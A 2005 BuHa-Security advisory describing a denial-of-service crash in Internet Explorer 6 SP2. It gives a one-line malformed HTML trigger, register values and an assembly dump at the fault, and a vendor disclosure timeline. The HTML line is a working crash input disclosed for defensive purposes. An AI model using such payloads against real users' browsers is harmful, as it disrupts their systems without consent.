[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
---------------------------------------------------
| BuHa Security-Advisory #6 | Dec 24th, 2005 |
---------------------------------------------------
| Vendor | M$ Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (DoS - Null Pointer Dereference) |
---------------------------------------------------
o Description:
=============
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: <mshtml.dll>#7d6d8eba
===================
Following HTML code forces M$ IE 6 to crash:
> <acronym><dd><h5><applet></caption></applet><li></h1>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html
These are the register values and the ASM dump at the time of the access
violation:
eax=00000000 ebx=01295390 ecx=00000000 edx=00000000 esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=00000000
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea4000000 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57 push edi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff call mshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d push 0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff call mshtml+0x8464d (7d53464d)
7d6d8eb2 50 push eax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff call mshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc]
ds:0023:0000000c=????
7d6d8ebe 6685d2 test dx,dx
7d6d8ec1 7c39 jl mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01 cmp dword ptr [mshtml+0x29e350
(7d74e350)],0x1
7d6d8eca 0fbffa movsx edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d mov eax,[mshtml+0x29e34c
(7d74e34c)]
7d6d8ed4 8b484c mov ecx,[eax+0x4c]
7d6d8ed7 8b4134 mov eax,[ecx+0x34]
7d6d8eda 8d147f lea edx,[edi+edi*2]
7d6d8edd 8b3c90 mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)
The access violation results in a null pointer dereference and is not
exploitable.
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==========
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=========
Christian Deneke <bugtraq@xxxxxxxxxx>
- --
Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG
A4pamspAa8+NY9TDiCz738s=
=Wga9
-----END PGP SIGNATURE-----